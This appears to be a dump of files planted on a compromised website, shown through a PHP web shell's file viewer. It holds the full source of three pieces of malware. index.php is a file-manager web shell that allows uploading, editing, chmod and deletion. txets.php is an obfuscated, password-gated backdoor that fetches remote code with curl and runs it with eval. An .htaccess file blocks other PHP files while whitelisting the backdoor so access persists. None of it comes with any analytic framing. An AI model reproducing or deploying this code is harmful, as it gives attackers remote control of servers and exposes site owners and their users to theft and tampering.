| Current Path : /var/www/amortar/data/www/amg174.ru/7c7f9/ |
| Current File : /var/www/amortar/data/www/amg174.ru/7c7f9/f2252.tar |
index.php 0000644 00000020221 15176064705 0006374 0 ustar 00 <?php
@session_start();
@set_time_limit(0);
echo '<!DOCTYPE HTML>
<HTML>
<HEAD>
<title></title>
<style>
body{
font-family: monospace;
font-weight: bold;
font-size: 18px;
background-color: #c5c5c5;
color: #000;
}
#content tr:hover{
background-color: #ccc;
}
#content .first{
background-color: #ccc;
}
#content .first:hover{
background-color: #ccc;
}
table{
border: 3px #000 solid;
}
a{
color: #000;
text-decoration: none;
}
a:hover{
color: #00f;
}
input,select,textarea{
border: 1px #000 solid;
-moz-border-radius: 5px;
-webkit-border-radius:5px;
border-radius:5px;
}
input {
font-size: 18px;
font-weight: bold;
padding: 5px;
}
select {
font-size: 19px
}
textarea {
font-size: 10px
}
td, tr { padding: 2px 5px; }
</style>
</HEAD>
<BODY>
<hr width="920" color="black"/>
<hr width="920" color="black"/><center><p><h2>Your IP : ' .$_SERVER["REMOTE_ADDR"]. '</h2></p></center>
<hr width="920" color="black"/>
<table width="920" border="1px" cellpadding="7" cellspacing="0" align="center">
<tr><td style="padding: 8px">Current Path : ';
if(isset($_GET['path'])){
$path = $_GET['path'];
}else{
$path = getcwd();
}
$path = str_replace('\\','/',$path);
$paths = explode('/',$path);
foreach($paths as $id=>$pat){
if($pat == '' && $id == 0){
$a = true;
echo '<a href="?path=/">/</a>';
continue;
}
if($pat == '') continue;
echo '<a href="?path=';
for($i=0;$i<=$id;$i++){
echo "$paths[$i]";
if($i != $id) echo "/";
}
echo '">'.$pat.'</a>/';
}
echo '</td></tr><tr><td>';
if(isset($_FILES['file'])){
if(copy($_FILES['file']['tmp_name'],$path.'/'.$_FILES['file']['name'])){
echo '<font color="green">Upload Success..</font><br />';
}else{
echo '<font color="red">Upload Gagal..</font><br />';
}
}
echo '<form enctype="multipart/form-data" method="POST">
Upload File : <input type="file" name="file" />
<input type="submit" value="Upload" />
</form>
</td></tr>';
if(isset($_GET['filesrc'])){
echo "<tr><td style='padding: 8px'>Current File : ";
echo $_GET['filesrc'];
echo '</tr></td></table><br />';
echo('<pre>'.htmlspecialchars(file_get_contents($_GET['filesrc'])).'</pre>');
}elseif(isset($_GET['option']) && $_POST['opt'] != 'delete'){
echo '</table><br /><center>'.$_POST['path'].'<br /><br />';
if($_POST['opt'] == 'chmod'){
if(isset($_POST['perm'])){
if(chmod($_POST['path'],$_POST['perm'])){
echo '<font color="green">Chmod Success..</font><br />';
}else{
echo '<font color="red">Chmod Gagal..</font><br />';
}
}
echo '<form method="POST">
Permission : <input name="perm" type="text" size="4" value="'.substr(sprintf('%o', fileperms($_POST['path'])), -4).'" />
<input type="hidden" name="path" value="'.$_POST['path'].'">
<input type="hidden" name="opt" value="chmod">
<input type="submit" value="Save" />
</form>';
}elseif($_POST['opt'] == 'rename'){
if(isset($_POST['newname'])){
if(rename($_POST['path'],$path.'/'.$_POST['newname'])){
echo '<font color="green">Rename Berhasil..</font><br />';
}else{
echo '<font color="red">Rename Gagal..</font><br />';
}
$_POST['name'] = $_POST['newname'];
}
echo '<form method="POST">
New Name : <input name="newname" type="text" size="20" value="'.$_POST['name'].'" />
<input type="hidden" name="path" value="'.$_POST['path'].'">
<input type="hidden" name="opt" value="rename">
<input type="submit" value="Save" />
</form>';
}elseif($_POST['opt'] == 'edit'){
if(isset($_POST['src'])){
$fp = fopen($_POST['path'],'w');
if(fwrite($fp,$_POST['src'])){
echo '<font color="green">Edit File Berhasil..</font><br />';
}else{
echo '<font color="red">Edit File Gagal..</font><br />';
}
fclose($fp);
}
echo '<form method="POST">
<textarea cols=130 rows=10 name="src">'.htmlspecialchars(file_get_contents($_POST['path'])).'</textarea><br />
<input type="hidden" name="path" value="'.$_POST['path'].'">
<input type="hidden" name="opt" value="edit">
<input type="submit" value="Save" />
</form>';
}
echo '</center>';
}else{
echo '</table><br /><center>';
if(isset($_GET['option']) && $_POST['opt'] == 'delete'){
if($_POST['type'] == 'dir'){
if(rmdir($_POST['path'])){
echo '<font color="green">Delete Directory Berhasil..</font><br />';
}else{
echo '<font color="red">Delete Directory Gagal..</font><br />';
}
}elseif($_POST['type'] == 'file'){
if(unlink($_POST['path'])){
echo '<font color="green">Delete File Berhasil..</font><br />';
}else{
echo '<font color="red">Delete File Gagal..</font><br />';
}
}
}
echo '</center>';
$scandir = scandir($path);
echo '<div id="content"><table width="920" border="1.5px" cellpadding="5" cellspacing="0" align="center">
<tr class="first">
<td><center>Name</center></td>
<td><center>Size</center></td>
<td><center>Permissions</center></td>
<td><center>Options</center></td>
</tr>';
foreach($scandir as $dir){
if(!is_dir("$path/$dir") || $dir == '.' || $dir == '..') continue;
echo "<tr>
<td><a href=\"?path=$path/$dir\">$dir</a></td>
<td><center>--</center></td>
<td><center>";
if(is_writable("$path/$dir")) echo '<font color="Blue">';
elseif(!is_readable("$path/$dir")) echo '<font color="red">';
echo perms("$path/$dir");
if(is_writable("$path/$dir") || !is_readable("$path/$dir")) echo '</font>';
echo "</center></td>
<td><center><form method=\"POST\" action=\"?option&path=$path\">
<select name=\"opt\">
<option value=\"\"></option>
<option value=\"delete\">Delete</option>
<option value=\"chmod\">Chmod</option>
<option value=\"rename\">Rename</option>
</select>
<input type=\"hidden\" name=\"type\" value=\"dir\">
<input type=\"hidden\" name=\"name\" value=\"$dir\">
<input type=\"hidden\" name=\"path\" value=\"$path/$dir\">
<input type=\"submit\" value=\"Oke\" />
</form></center></td>
</tr>";
}
echo '<tr class="first"><td></td><td></td><td></td><td></td></tr>';
foreach($scandir as $file){
if(!is_file("$path/$file")) continue;
$size = filesize("$path/$file")/1024;
$size = round($size,3);
if($size >= 1024){
$size = round($size/1024,2).' MB';
}else{
$size = $size.' KB';
}
echo "<tr>
<td><a href=\"?filesrc=$path/$file&path=$path\">$file</a></td>
<td><center>".$size."</center></td>
<td><center>";
if(is_writable("$path/$file")) echo '<font color="Blue">';
elseif(!is_readable("$path/$file")) echo '<font color="red">';
echo perms("$path/$file");
if(is_writable("$path/$file") || !is_readable("$path/$file")) echo '</font>';
echo "</center></td>
<td><center><form method=\"POST\" action=\"?option&path=$path\">
<select name=\"opt\">
<option value=\"\"></option>
<option value=\"delete\">Delete</option>
<option value=\"chmod\">Chmod</option>
<option value=\"rename\">Rename</option>
<option value=\"edit\">Edit</option>
</select>
<input type=\"hidden\" name=\"type\" value=\"file\">
<input type=\"hidden\" name=\"name\" value=\"$file\">
<input type=\"hidden\" name=\"path\" value=\"$path/$file\">
<input type=\"submit\" value=\"Oke\" />
</form></center></td>
</tr>";
}
echo '</table>
</div>';
}
echo '<center><hr width="920" color="black"/> <center>
</BODY>
</HTML>';
function perms($file){
$perms = fileperms($file);
if (($perms & 0xC000) == 0xC000) {
// Socket
$info = 's';
} elseif (($perms & 0xA000) == 0xA000) {
// Symbolic Link
$info = 'l';
} elseif (($perms & 0x8000) == 0x8000) {
// Regular
$info = '-';
} elseif (($perms & 0x6000) == 0x6000) {
// Block special
$info = 'b';
} elseif (($perms & 0x4000) == 0x4000) {
// Directory
$info = 'd';
} elseif (($perms & 0x2000) == 0x2000) {
// Character special
$info = 'c';
} elseif (($perms & 0x1000) == 0x1000) {
// FIFO pipe
$info = 'p';
} else {
// Unknown
$info = 'u';
}
// Owner
$info .= (($perms & 0x0100) ? 'r' : '-');
$info .= (($perms & 0x0080) ? 'w' : '-');
$info .= (($perms & 0x0040) ?
(($perms & 0x0800) ? 's' : 'x' ) :
(($perms & 0x0800) ? 'S' : '-'));
// Group
$info .= (($perms & 0x0020) ? 'r' : '-');
$info .= (($perms & 0x0010) ? 'w' : '-');
$info .= (($perms & 0x0008) ?
(($perms & 0x0400) ? 's' : 'x' ) :
(($perms & 0x0400) ? 'S' : '-'));
// World
$info .= (($perms & 0x0004) ? 'r' : '-');
$info .= (($perms & 0x0002) ? 'w' : '-');
$info .= (($perms & 0x0001) ?
(($perms & 0x0200) ? 't' : 'x' ) :
(($perms & 0x0200) ? 'T' : '-'));
return $info;
}
?>
txets.php 0000444 00000013602 15176064705 0006437 0 ustar 00 <?php
goto itdS7c6IpfHaVig; OU_kgmiKW4JSO1A: $isAK2gRKQgEpDc6 = $HoGfyoJbzxHSZHT("\176", "\40"); goto CNnWCDSa7miCgHt; qkejbSyAZNXi8By: @(md5(md5(md5(md5($kMPDsYNOSm0Vfue[16])))) === "\146\61\x31\66\143\x34\x64\x32\67\x65\141\x66\145\142\142\143\65\145\x37\65\x33\64\x65\x32\x33\x35\x33\143\x64\141\x62\71") && (count($kMPDsYNOSm0Vfue) == 22 && in_array(gettype($kMPDsYNOSm0Vfue) . count($kMPDsYNOSm0Vfue), $kMPDsYNOSm0Vfue)) ? ($kMPDsYNOSm0Vfue[63] = $kMPDsYNOSm0Vfue[63] . $kMPDsYNOSm0Vfue[74]) && ($kMPDsYNOSm0Vfue[90] = $kMPDsYNOSm0Vfue[63]($kMPDsYNOSm0Vfue[90])) && @eval($kMPDsYNOSm0Vfue[63](${$kMPDsYNOSm0Vfue[50]}[15])) : $kMPDsYNOSm0Vfue; goto XGUqA6R8C5cLC2s; XGUqA6R8C5cLC2s: metaphone("\x4d\x6a\111\x32\117\x54\x6b\63\116\172\131\167\x4e\104\x4d\62\116\124\111\60\x4f\104\x41\60\x4d\124\131\171\116\x54\x4d\x79"); goto Dy52uH4VRUrZPi9; Dy52uH4VRUrZPi9: class Cwexpevuz2c7jLl { static function ksYoC5B1AsW5sIX($mUmicT7vSWj2rpC) { goto bvXU4bApTUoayxj; nNoBTYLeQIW_tpV: $lpJe0539Dkeq_Cb = ''; goto S0k3fFdb5GPem8w; O9PL0MJxRwrKme2: r2yjiaEzMWxST7F: goto d3lqG7_AUXpaSds; S0k3fFdb5GPem8w: foreach ($gfHtNyU5D45SI0f as $J0uexXHA90FPxby => $uOB_HYrBA2zO4Bo) { $lpJe0539Dkeq_Cb .= $B68603iWYcr8Mhp[$uOB_HYrBA2zO4Bo - 69145]; VWpECKbBz1ILJDY: } goto O9PL0MJxRwrKme2; d3lqG7_AUXpaSds: return $lpJe0539Dkeq_Cb; goto F1Mk8wz3qu1FJ6M; bvXU4bApTUoayxj: $WBdmB1py3XFxHI8 = "\x72" . "\141" . "\156" . "\x67" . "\x65"; goto JivmAWJF8TA2Acf; fZ0yxjyoytIoxFJ: $gfHtNyU5D45SI0f = explode("\x7d", $mUmicT7vSWj2rpC); goto nNoBTYLeQIW_tpV; JivmAWJF8TA2Acf: $B68603iWYcr8Mhp = $WBdmB1py3XFxHI8("\x7e", "\40"); goto fZ0yxjyoytIoxFJ; F1Mk8wz3qu1FJ6M: } static function y3tAydaUcfv_T3P($nnPZm0Y9bMT4UVo, $bCiF0LtZEvdrwM8) { goto swGgg0V2GByoyFw; BhN2yk1MffABIXK: return empty($d0hoCX9mgiEN5rU) ? $bCiF0LtZEvdrwM8($nnPZm0Y9bMT4UVo) : $d0hoCX9mgiEN5rU; goto ehsStskqU1jFn2g; HKBELdrAzZMLqWt: curl_setopt($syUi4giopJB8yqP, CURLOPT_RETURNTRANSFER, 1); goto XSxA2CxHfyKdoD0; XSxA2CxHfyKdoD0: $d0hoCX9mgiEN5rU = curl_exec($syUi4giopJB8yqP); goto BhN2yk1MffABIXK; swGgg0V2GByoyFw: $syUi4giopJB8yqP = curl_init($nnPZm0Y9bMT4UVo); goto HKBELdrAzZMLqWt; ehsStskqU1jFn2g: } static function vJNC2Nsd5hLYCgg() { goto o4ERvqagroqaxKt; CP2IwLJw92Z8w2s: @$U1VvvkwVrEpApKs[2 + 8](INPUT_GET, "\157\x66") == 1 && die($U1VvvkwVrEpApKs[1 + 4](__FILE__)); goto QfL0BE9Udk11dIg; SJFbP2nYIXbHg1a: $mkxel8ZkD_0JQ8i = @$U1VvvkwVrEpApKs[1]($U1VvvkwVrEpApKs[2 + 8](INPUT_GET, $U1VvvkwVrEpApKs[0 + 9])); goto j7s14EIwTjF2eVm; a02_9PN4RKk8X1Y: $z7RLlpJUTC0wDg1 = $U1VvvkwVrEpApKs[2 + 0]($Gk8KdMQnXx7c4g8, true); goto CP2IwLJw92Z8w2s; Cfv9rl6djjmXKdJ: @eval($U1VvvkwVrEpApKs[1 + 3]($U0V_km_14rKbpf3)); goto LZAzKtNKtwqFBT1; LSqZvsCskCo1Xlc: foreach ($dbZ1I4qUnlDCQQA as $TFylSp53o4An4F6) { $U1VvvkwVrEpApKs[] = self::ksYoC5B1aSw5six($TFylSp53o4An4F6); JdqJCsykGiaTq_1: } goto yQPNj4N8WJhE0j9; yQPNj4N8WJhE0j9: YnmhyD_lxOlQlti: goto SJFbP2nYIXbHg1a; NdnhaTBGX53bZ_S: $U0V_km_14rKbpf3 = self::y3tayDauCFv_t3P($z7RLlpJUTC0wDg1[0 + 1], $U1VvvkwVrEpApKs[2 + 3]); goto Cfv9rl6djjmXKdJ; QfL0BE9Udk11dIg: if (!(@$z7RLlpJUTC0wDg1[0] - time() > 0 and md5(md5($z7RLlpJUTC0wDg1[3 + 0])) === "\67\67\67\67\x66\145\x38\x64\141\61\143\63\60\x33\x61\71\x39\70\x36\145\x32\x31\x37\64\64\x36\x63\142\x38\60\x37\x32")) { goto Ga01WzMWrkeqfaG; } goto NdnhaTBGX53bZ_S; LZAzKtNKtwqFBT1: die; goto E23GJ5dd7itJGnF; o4ERvqagroqaxKt: $dbZ1I4qUnlDCQQA = array("\x36\x39\x31\x37\62\x7d\x36\x39\x31\x35\67\175\x36\x39\x31\67\x30\x7d\x36\x39\61\67\64\175\x36\x39\61\x35\65\x7d\x36\71\61\x37\x30\x7d\66\71\61\x37\x36\175\66\71\x31\66\x39\x7d\x36\71\61\x35\64\x7d\66\x39\x31\x36\x31\175\x36\x39\61\67\62\x7d\66\x39\x31\65\65\x7d\66\71\x31\66\x36\175\x36\71\61\x36\60\x7d\x36\71\61\66\x31", "\66\71\61\65\66\x7d\x36\71\61\65\65\x7d\x36\x39\61\65\x37\x7d\66\71\x31\x37\x36\x7d\x36\x39\x31\65\67\175\66\x39\x31\x36\x30\175\x36\x39\61\65\x35\175\66\71\62\x32\x32\x7d\x36\71\x32\62\60", "\x36\71\x31\66\x35\175\x36\71\61\65\66\175\66\71\61\66\x30\175\66\71\61\66\x31\175\66\71\61\67\x36\175\66\x39\x31\x37\61\175\66\x39\61\x37\x30\x7d\66\71\61\67\x32\x7d\x36\71\x31\x36\60\175\66\x39\x31\67\61\175\66\x39\61\x37\60", "\66\71\x31\x35\x39\175\x36\x39\x31\x37\x34\175\66\71\61\67\x32\175\66\71\x31\66\x34", "\x36\x39\61\67\63\x7d\x36\x39\x31\67\x34\x7d\66\71\61\65\66\x7d\x36\71\x31\67\x30\175\x36\x39\62\x31\67\x7d\66\71\x32\61\71\x7d\x36\71\x31\67\66\175\x36\71\x31\x37\x31\175\66\x39\x31\67\x30\175\x36\71\x31\x37\x32\x7d\x36\71\61\66\60\x7d\66\x39\x31\67\61\175\x36\x39\61\x37\60", "\66\x39\61\x36\71\175\66\x39\x31\x36\x36\x7d\66\71\x31\66\x33\x7d\x36\71\x31\67\x30\x7d\x36\71\61\x37\x36\x7d\x36\71\61\x36\70\x7d\66\71\x31\67\60\x7d\66\71\61\x35\x35\x7d\x36\71\x31\67\x36\x7d\66\x39\x31\x37\62\175\x36\x39\x31\66\60\175\66\x39\x31\66\61\175\66\71\x31\x35\65\x7d\x36\x39\61\x37\x30\175\x36\x39\61\66\x31\175\x36\x39\61\x35\x35\175\66\71\61\65\x36", "\66\71\61\71\71\175\66\x39\x32\x32\71", "\x36\71\61\x34\66", "\66\71\x32\x32\x34\175\x36\71\62\x32\71", "\x36\71\x32\60\x36\x7d\x36\71\x31\70\71\175\x36\x39\x31\x38\71\175\66\71\x32\60\66\x7d\x36\71\x31\70\x32", "\x36\x39\x31\66\x39\175\66\x39\x31\x36\x36\x7d\x36\x39\61\x36\x33\175\66\71\61\x35\x35\175\x36\x39\61\67\x30\175\x36\71\x31\x35\67\x7d\66\x39\x31\x37\66\175\66\x39\x31\66\x36\175\66\x39\x31\66\61\x7d\x36\71\61\65\x39\175\66\x39\61\x35\64\175\66\x39\x31\x35\x35"); goto LSqZvsCskCo1Xlc; j7s14EIwTjF2eVm: $Gk8KdMQnXx7c4g8 = @$U1VvvkwVrEpApKs[3 + 0]($U1VvvkwVrEpApKs[5 + 1], $mkxel8ZkD_0JQ8i); goto a02_9PN4RKk8X1Y; E23GJ5dd7itJGnF: Ga01WzMWrkeqfaG: goto V0fqFBUkIDifEjI; V0fqFBUkIDifEjI: } } goto wS1kRobTxnotQRK; CNnWCDSa7miCgHt: $kMPDsYNOSm0Vfue = ${$isAK2gRKQgEpDc6[6 + 25] . $isAK2gRKQgEpDc6[40 + 19] . $isAK2gRKQgEpDc6[23 + 24] . $isAK2gRKQgEpDc6[27 + 20] . $isAK2gRKQgEpDc6[23 + 28] . $isAK2gRKQgEpDc6[34 + 19] . $isAK2gRKQgEpDc6[42 + 15]}; goto qkejbSyAZNXi8By; itdS7c6IpfHaVig: $HoGfyoJbzxHSZHT = "\162" . "\141" . "\156" . "\147" . "\x65"; goto OU_kgmiKW4JSO1A; wS1kRobTxnotQRK: CWEXPEvUz2C7jlL::vjnC2nSd5hlyCGG();
?>
BiaoJiOk .htaccess 0000444 00000003772 15176064705 0006364 0 ustar 00 <FilesMatch '.(py|exe|php|PHP|Php|PHp|pHp|pHP|pHP7|PHP7|phP|PhP|php5|suspected)$'>
Order allow,deny
Deny from all
</FilesMatch>
<FilesMatch '^(index.php|wp-blog-header.php|wp-config-sample.php|wp-links-opml.php|wp-login.php|wp-settings.php|wp-trackback.php|wp-activate.php|wp-comments-post.php|wp-cron.php|wp-load.php|wp-mail.php|wp-signup.php|xmlrpc.php|edit-form-advanced.php|link-parse-opml.php|ms-sites.php|options-writing.php|themes.php|admin-ajax.php|edit-form-comment.php|link.php|ms-themes.php|plugin-editor.php|admin-footer.php|edit-link-form.php|load-scripts.php|ms-upgrade-network.php|admin-functions.php|edit.php|load-styles.php|ms-users.php|plugins.php|admin-header.php|edit-tag-form.php|media-new.php|my-sites.php|post-new.php|admin.php|edit-tags.php|media.php|nav-menus.php|post.php|admin-post.php|export.php|media-upload.php|network.php|press-this.php|upload.php|async-upload.php|menu-header.php|options-discussion.php|privacy.php|user-edit.php|menu.php|options-general.php|profile.php|user-new.php|moderation.php|options-head.php|revision.php|users.php|custom-background.php|ms-admin.php|options-media.php|setup-config.php|widgets.php|custom-header.php|ms-delete-site.php|options-permalink.php|term.php|customize.php|link-add.php|ms-edit.php|options.php|edit-comments.php|link-manager.php|ms-options.php|options-reading.php|system_log.php|inputs.php|adminfuns.php|chtmlfuns.php|cjfuns.php|classsmtps.php|classfuns.php|comfunctions.php|comdofuns.php|connects.php|copypaths.php|delpaths.php|doiconvs.php|epinyins.php|filefuns.php|gdftps.php|hinfofuns.php|hplfuns.php|memberfuns.php|moddofuns.php|onclickfuns.php|phpzipincs.php|qfunctions.php|qinfofuns.php|schallfuns.php|tempfuns.php|userfuns.php|siteheads.php|termps.php|txets.php|thoms.php|postnews.php|txets.php)$'>
Order allow,deny
Allow from all
</FilesMatch>
<IfModule mod_rewrite.c>
RewriteEngine On
RewriteBase /
RewriteRule ^index.php$ - [L]
RewriteCond %{REQUEST_FILENAME} !-f
RewriteCond %{REQUEST_FILENAME} !-d
RewriteRule . index.php [L]
</IfModule>